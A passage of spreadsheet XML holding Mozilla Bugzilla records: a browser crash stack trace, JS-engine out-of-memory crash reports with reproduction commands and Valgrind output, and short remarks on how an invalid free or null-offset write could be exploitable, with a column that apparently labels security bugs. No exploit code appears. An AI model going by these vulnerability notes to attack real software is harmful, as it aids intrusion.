    #136 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #137 0x7fce4ca0ac7d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #138 0x7fce46593bcf in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #139 0x7fce46fc430a in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #140 0x7fce46fc430a in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #141 0x7fce46f8e6ad in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134:16
    #142 0x7fce46f900d7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
    #143 0x7fce46f7ae36 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
    #144 0x7fce46f7e4c8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #145 0x7fce4920a5f3 in PresShell::FireResizeEvent() /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:2038:5
    #146 0x7fce492201a8 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4122:7
    #147 0x7fce4920e7e6 in FlushPendingNotifications /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4054:3
    #148 0x7fce4920e7e6 in HandlePostedReflowCallbacks /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4022
    #149 0x7fce4920e7e6 in PresShell::DidDoReflow(bool) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:9217
    #150 0x7fce4920b1ad in PresShell::ResizeReflowIgnoreOverride(int, int, int, int) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:1974:7
    #151 0x7fce487e5bb0 in DoSetWindowDimensions /home/worker/workspace/build/src/view/nsViewManager.cpp:192:7
    #152 0x7fce487e5bb0 in nsViewManager::SetWindowDimensions(int, int, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:228
    #153 0x7fce4917ffbf in nsDocumentViewer::SetBoundsWithFlags(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, unsigned int) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2005:5
    #154 0x7fce4918012b in nsDocumentViewer::SetBoundsWithFlags(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, unsigned int) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2019:5
    #155 0x7fce49f0812c in SetPositionAndSize /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5999:19
    #156 0x7fce49f0812c in non-virtual thunk to nsDocShell::SetPositionAndSize(int, int, int, int, unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5985
    #157 0x7fce4511d224 in nsFrameLoader::UpdateBaseWindowPositionAndSize(nsSubDocumentFrame*) /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:2500:5
    #158 0x7fce4511cc7e in nsFrameLoader::UpdatePositionAndSize(nsSubDocumentFrame*) /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:2472:3
    #159 0x7fce4951fc6d in ReflowFinished /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:817:5
    #160 0x7fce4951fc6d in non-virtual thunk to nsSubDocumentFrame::ReflowFinished() /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:812
    #161 0x7fce4920e753 in HandlePostedReflowCallbacks /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4013:12
    #162 0x7fce4920e753 in PresShell::DidDoReflow(bool) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:9217
    #163 0x7fce4920b1ad in PresShell::ResizeReflowIgnoreOverride(int, int, int, int) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:1974:7
    #164 0x7fce487e5bb0 in DoSetWindowDimensions /home/worker/workspace/build/src/view/nsViewManager.cpp:192:7
    #165 0x7fce487e5bb0 in nsViewManager::SetWindowDimensions(int, int, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:228
    #166 0x7fce4917ffbf in nsDocumentViewer::SetBoundsWithFlags(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, unsigned int) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2005:5
    #167 0x7fce49f0812c in SetPositionAndSize /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5999:19
    #168 0x7fce49f0812c in non-virtual thunk to nsDocShell::SetPositionAndSize(int, int, int, int, unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5985
    #169 0x7fce4a05c034 in WindowResized /home/worker/workspace/build/src/xpfe/appshell/nsWebShellWindow.cpp:298:5
    #170 0x7fce4a05c034 in non-virtual thunk to nsWebShellWindow::WindowResized(nsIWidget*, int, int) /home/worker/workspace/build/src/xpfe/appshell/nsWebShellWindow.cpp:294
    #171 0x7fce488a5d62 in DispatchResized /home/worker/workspace/build/src/widget/gtk/nsWindow.cpp:550:9
    #172 0x7fce488a5d62 in nsWindow::Resize(double, double, bool) /home/worker/workspace/build/src/widget/gtk/nsWindow.cpp:1140
    #173 0x7fce4a071c2c in nsXULWindow::SetSize(int, int, bool) /home/worker/workspace/build/src/xpfe/appshell/nsXULWindow.cpp:624:17
    #174 0x7fce44d51f3e in nsGlobalWindow::ResizeByOuter(int, int, mozilla::ErrorResult&amp;, bool) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:7965:12
    #175 0x7fce4633899d in mozilla::dom::WindowBinding::resizeBy(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGlobalWindow*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:3467:3
    #176 0x7fce4632ff69 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15158:13
    #177 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #178 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #179 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #180 0x7fce4cca869c in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #181 0x7fce4cc77ccf in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
    #182 0x7fce4cc857bf in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
    #183 0x7fce4cc87f6e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
    #184 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #185 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #186 0x7fce4cf1977f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #187 0x7fce4cf1977f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #188 0x7fce4cefe93d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #189 0x7fce4cf399df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #190 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #191 0x7fce4ca0ac7d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #192 0x7fce466d7769 in mozilla::dom::Function::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, nsTArray&lt;JS::Value&gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8
    #193 0x7fce44d87167 in Call&lt;nsCOMPtr&lt;nsISupports&gt; &gt; /home/worker/workspace/build/sr</t>
        </is>
      </c>
      <c r="X6443" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6444">
      <c r="A6444" t="n">
        <v>756600</v>
      </c>
      <c r="B6444" t="inlineStr">
        <is>
          <t>2012-05-18 13:45:14 -0700</t>
        </is>
      </c>
      <c r="C6444" t="inlineStr">
        <is>
          <t>OOM Testing: Glibc Abort due to invalid free in js::TokenStream::~TokenStream</t>
        </is>
      </c>
      <c r="D6444" t="inlineStr">
        <is>
          <t>2013-03-11 06:27:58 -0700</t>
        </is>
      </c>
      <c r="E6444" t="n">
        <v>1</v>
      </c>
      <c r="F6444" t="n">
        <v>1</v>
      </c>
      <c r="G6444" t="n">
        <v>3</v>
      </c>
      <c r="H6444" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6444" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6444" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6444" t="inlineStr">
        <is>
          <t>Other Branch</t>
        </is>
      </c>
      <c r="L6444" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6444" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6444" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6444" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6444" t="inlineStr">
        <is>
          <t>[qa-][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q6444" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6444" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6444" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T6444" t="n">
        <v>1</v>
      </c>
      <c r="U6444" t="n">
        <v>0</v>
      </c>
      <c r="V6444" t="n">
        <v>21</v>
      </c>
      <c r="W6444" t="inlineStr">
        <is>
          <t>The following command crashes on ionmonkey revision 8c54899dae82 (dbg build):
js  -e 'const libdir = "js/src/jit-test/lib/";' -A 7046 -f js/src/jit-test/tests/debug/breakpoint-resume-01.js</t>
        </is>
      </c>
      <c r="X6444" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6445">
      <c r="A6445" t="n">
        <v>1499714</v>
      </c>
      <c r="B6445" t="inlineStr">
        <is>
          <t>2018-10-17 06:57:12 -0700</t>
        </is>
      </c>
      <c r="C6445" t="inlineStr">
        <is>
          <t>crashes for b99 builds can get the wrong version_string</t>
        </is>
      </c>
      <c r="D6445" t="inlineStr">
        <is>
          <t>2018-10-17 12:50:42 -0700</t>
        </is>
      </c>
      <c r="E6445" t="n">
        <v>1</v>
      </c>
      <c r="F6445" t="n">
        <v>1</v>
      </c>
      <c r="G6445" t="n">
        <v>4</v>
      </c>
      <c r="H6445" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6445" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J6445" t="inlineStr">
        <is>
          <t>Processor</t>
        </is>
      </c>
      <c r="K6445" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6445" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6445" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6445" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6445" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6445" t="inlineStr"/>
      <c r="Q6445" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6445" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6445" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6445" t="n">
        <v>1</v>
      </c>
      <c r="U6445" t="n">
        <v>0</v>
      </c>
      <c r="V6445" t="n">
        <v>7</v>
      </c>
      <c r="W6445" t="inlineStr">
        <is>
          <t>Crash reports for 63.0b99 (version: 63.0, build id: 20181015152800) are coming in and getting assigned "63.0" as the version string.
Example:
bp-7e0f45e9-6246-448a-a3c9-6f3c70181017
This bug covers figuring out why, fixing it, and reprocessing affected crashes.</t>
        </is>
      </c>
      <c r="X6445" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6446">
      <c r="A6446" t="n">
        <v>730415</v>
      </c>
      <c r="B6446" t="inlineStr">
        <is>
          <t>2012-02-24 12:23:08 -0800</t>
        </is>
      </c>
      <c r="C6446" t="inlineStr">
        <is>
          <t>JS OOM Testing: Invalid free in JSObject::makeDenseArraySlow</t>
        </is>
      </c>
      <c r="D6446" t="inlineStr">
        <is>
          <t>2012-05-21 15:05:50 -0700</t>
        </is>
      </c>
      <c r="E6446" t="n">
        <v>1</v>
      </c>
      <c r="F6446" t="n">
        <v>1</v>
      </c>
      <c r="G6446" t="n">
        <v>3</v>
      </c>
      <c r="H6446" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6446" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6446" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6446" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6446" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6446" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6446" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6446" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6446" t="inlineStr">
        <is>
          <t>[qa!] js-triage-needed</t>
        </is>
      </c>
      <c r="Q6446" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6446" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6446" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T6446" t="n">
        <v>1</v>
      </c>
      <c r="U6446" t="n">
        <v>0</v>
      </c>
      <c r="V6446" t="n">
        <v>16</v>
      </c>
      <c r="W6446" t="inlineStr">
        <is>
          <t>The following command crashes on mozilla-central revision 13b571bde26a:
js -A 380 -f js/src/jit-test/shell.js -f js/src/jit-test/tests/jaeger/bug709067.js
I'm getting a glibc abort here:
*** glibc detected *** debug64/js: free(): invalid pointer: 0x0000000000b361a0 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x78a8f)[0x7f3434a03a8f]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x73)[0x7f3434a078e3]
In Valgrind:
==6766== Invalid free() / delete / delete[]
==6766==    at 0x4C282ED: free (vg_replace_malloc.c:366)
==6766==    by 0x403933: js_free (Utility.h:152)
==6766==    by 0x4118DD: js::Foreground::free_(void*) (Utility.h:566)
==6766==    by 0x41B7C5: JSRuntime::free_(void*) (jscntxt.h:640)
==6766==    by 0x41B84B: JSContext::free_(void*) (jscntxt.h:1126)
==6766==    by 0x451C07: JSObject::makeDenseArraySlow(JSContext*) (jsarray.cpp:1392)
==6766==    by 0x450CD6: array_setGeneric(JSContext*, JSObject*, jsid, JS::Value*, int) (jsarray.cpp:914)
==6766==    by 0x533C7D: JSObject::nonNativeSetProperty(JSContext*, jsid, JS::Value*, int) (jsobj.cpp:3124)
==6766==    by 0x44649F: JSObject::setGeneric(JSContext*, jsid, JS::Value*, int) (jsobjinlines.h:162)
==6766==    by 0x4F9C67: js::SetObjectElementOperation(JSContext*, JSObject*, jsid, JS::Value const&amp;) (jsinterpinlines.h:829)
==6766==    by 0x506942: js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) (jsinterp.cpp:2640)
==6766==    by 0x4FAFDE: js::RunScript(JSContext*, JSScript*, js::StackFrame*) (jsinterp.cpp:454)
==6766==  Address 0xb361a0 is 0 bytes inside data symbol "_ZL17emptyObjectHeader"
At first glance it looks like some pointer arithmetic magic going wrong in jsobj.h (NULL pointer, likely from OOM is added to elements size to form a new pointer that is freed).
If the size is controllable (and I assume it will be somehow), then this is exploitable if the attacker can force OOM for the script in the right moment.</t>
        </is>
      </c>
      <c r="X6446" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6447">
      <c r="A6447" t="n">
        <v>995075</v>
      </c>
      <c r="B6447" t="inlineStr">
        <is>
          <t>2014-04-10 22:26:13 -0700</t>
        </is>
      </c>
      <c r="C6447" t="inlineStr">
        <is>
          <t>OOM large null-offset write in update_filter() triggered with AudioBufferSourceNode</t>
        </is>
      </c>
      <c r="D6447" t="inlineStr">
        <is>
          <t>2016-06-04 16:02:04 -0700</t>
        </is>
      </c>
      <c r="E6447" t="n">
        <v>1</v>
      </c>
      <c r="F6447" t="n">
        <v>1</v>
      </c>
      <c r="G6447" t="n">
        <v>3</v>
      </c>
      <c r="H6447" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6447" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6447" t="inlineStr">
        <is>
          <t>Web Audio</t>
        </is>
      </c>
      <c r="K6447" t="inlineStr">
        <is>
          <t>31 Branch</t>
        </is>
      </c>
      <c r="L6447" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6447" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6447" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6447" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6447" t="inlineStr">
        <is>
          <t>[adv-main32+][adv-esr31.1+]</t>
        </is>
      </c>
      <c r="Q6447" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6447" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6447" t="inlineStr">
        <is>
          <t>mozilla34</t>
        </is>
      </c>
      <c r="T6447" t="n">
        <v>1</v>
      </c>
      <c r="U6447" t="n">
        <v>0</v>
      </c>
      <c r="V6447" t="n">
        <v>24</v>
      </c>
      <c r="W6447" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #987679 +++
A memory allocation failure at
http://hg.mozilla.org/mozilla-central/annotate/d41e6e32df81/media/libspeex_resampler/src/resample.c#l698
can cause content-controlled data to be written to a large content-controlled offset from null.
There is eventually a null deref, which will crash the program, but there will be a period of time during which other threads will continue to run compromised.
The allocation request can be large, so it would not be difficult to generate an OOM under similar situations to bug 987679.</t>
        </is>
      </c>
      <c r="X6447" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6448">
      <c r="A6448" t="n">
        <v>1209366</v>
      </c>
      <c r="B6448" t="inlineStr">
        <is>
          <t>2015-09-28 18:25:25 -0700</t>
        </is>
      </c>
      <c r="C6448" t="inlineStr">
        <is>
          <t>MSan: use-of-uninitialized-value ReadHuffmanCode</t>
        </is>
      </c>
      <c r="D6448" t="inlineStr">
        <is>
          <t>2016-07-02 11:29:27 -0700</t>
        </is>
      </c>
      <c r="E6448" t="n">
        <v>1</v>
      </c>
      <c r="F6448" t="n">
        <v>1</v>
      </c>
      <c r="G6448" t="n">
        <v>3</v>
      </c>
      <c r="H6448" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6448" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6448" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K6448" t="inlineStr">
        <is>
          <t>41 Branch</t>
        </is>
      </c>
      <c r="L6448" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6448" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6448" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6448" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6448" t="inlineStr">
        <is>
          <t>[adv-main44+]</t>
        </is>
      </c>
      <c r="Q6448" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6448" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6448" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6448" t="n">
        <v>1</v>
      </c>
      <c r="U6448" t="n">
        <v>0</v>
      </c>
      <c r="V6448" t="n">
        <v>3</v>
      </c>
      <c r="W6448" t="inlineStr">
        <is>
          <t>Created attachment 8667053
call_stack.txt
Not sure which component this should go under so I copied bug 366559 for now.
I am fuzzing commit https://github.com/google/brotli/commit/ca29aa22c295daac15baf5d85427ecc7808b515c
This is the version of brotli currently shipping in Firefox (https://hg.mozilla.org/mozilla-central/log/tip/modules/brotli/dec/decode.c).
It is currently used in WOFF2.</t>
        </is>
      </c>
      <c r="X6448" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6449">
      <c r="A6449" t="n">
        <v>238654</v>
      </c>
      <c r="B6449" t="inlineStr">
        <is>
          <t>2004-03-25 10:11:56 -0800</t>
        </is>
      </c>
      <c r="C6449" t="inlineStr">
        <is>
          <t>[FIXr]Content-location possible regression in 1.7b: may 'fail' on many servers</t>
        </is>
      </c>
      <c r="D6449" t="inlineStr">
        <is>
          <t>2006-03-12 17:27:47 -0800</t>
        </is>
      </c>
      <c r="E6449" t="n">
        <v>1</v>
      </c>
      <c r="F6449" t="n">
        <v>1</v>
      </c>
      <c r="G6449" t="n">
        <v>3</v>
      </c>
      <c r="H6449" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6449" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6449" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K6449" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6449" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6449" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6449" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6449" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6449" t="inlineStr"/>
      <c r="Q6449" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6449" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6449" t="inlineStr">
        <is>
          <t>mozilla1.7final</t>
        </is>
      </c>
      <c r="T6449" t="n">
        <v>1</v>
      </c>
      <c r="U6449" t="n">
        <v>0</v>
      </c>
      <c r="V6449" t="n">
        <v>58</v>
      </c>
      <c r="W6449" t="inlineStr">
        <is>
          <t>After fix for bug 109553 was committed, one major server failed because of HTTP
content-location badly configured: bug 231072.
After 1.7b was released, it seems like this rate is increasing: bug 238156, bug
238314, and now a bank site in bug 238626.
The worrying part is that 10% of the IIS servers seem to be wrongly configured
on the Internet (not to mention the Intranet servers), according to:
http://www.securityspace.com/s_survey/data/man.200402/firewalled_cloc.html
[...]
Number of IIS Servers that revealed an IP in the Content-Location tag different
from the IP accepting the connection    75,938    9.40%
[...]
1.7 will to be the first non-beta release of Mozilla (Firefox 0.8 doesn't have
it) to ship with this new feature and I'm afraid it could fail on many servers.
Possible solutions:
 - a pref to disable it ? by default ?
 - not taking care of content-location when served by IIS and Oracle9 (the
servers we've seen so far) ?
Mozilla has done something similar with HTTP pipelining in the past:
http://lxr.mozilla.org/seamonkey/source/netwerk/protocol/http/src/nsHttpConnection.cpp#236
(originally posted on n.p.m.netlib on march 22nd)</t>
        </is>
      </c>
      <c r="X6449" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6450">
      <c r="A6450" t="n">
        <v>34780</v>
      </c>
      <c r="B6450" t="inlineStr">
        <is>
          <t>2000-04-06 00:52:07 -0700</t>
        </is>
      </c>
      <c r="C6450" t="inlineStr">
        <is>
          <t>Clicking on Add to Addressbook in vCard crashes Mozilla</t>
        </is>
      </c>
      <c r="D6450" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E6450" t="n">
        <v>1</v>
      </c>
      <c r="F6450" t="n">
        <v>1</v>
      </c>
      <c r="G6450" t="n">
        <v>2</v>
      </c>
      <c r="H6450" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6450" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J6450" t="inlineStr">
        <is>
          <t>MailNews: Message Display</t>
        </is>
      </c>
      <c r="K6450" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6450" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6450" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N6450" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6450" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6450" t="inlineStr"/>
      <c r="Q6450" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6450" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6450" t="inlineStr">
        <is>
          <t>M16</t>
        </is>
      </c>
      <c r="T6450" t="n">
        <v>1</v>
      </c>
      <c r="U6450" t="n">
        <v>0</v>
      </c>
      <c r="V6450" t="n">
        <v>13</v>
      </c>
      <c r="W6450" t="inlineStr">
        <is>
          <t>The subject says it all.
2000040520</t>
        </is>
      </c>
      <c r="X6450" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6451">
      <c r="A6451" t="n">
        <v>645289</v>
      </c>
      <c r="B6451" t="inlineStr">
        <is>
          <t>2011-03-26 01:26:12 -0700</t>
        </is>
      </c>
      <c r="C6451" t="inlineStr">
        <is>
          <t>Crash [@ nsNPAPIPluginInstance::GetImage ] mainly with Webex</t>
        </is>
      </c>
      <c r="D6451" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E6451" t="n">
        <v>1</v>
      </c>
      <c r="F6451" t="n">
        <v>1</v>
      </c>
      <c r="G6451" t="n">
        <v>6</v>
      </c>
      <c r="H6451" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6451" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J6451" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K6451" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6451" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6451" t="inlineStr">
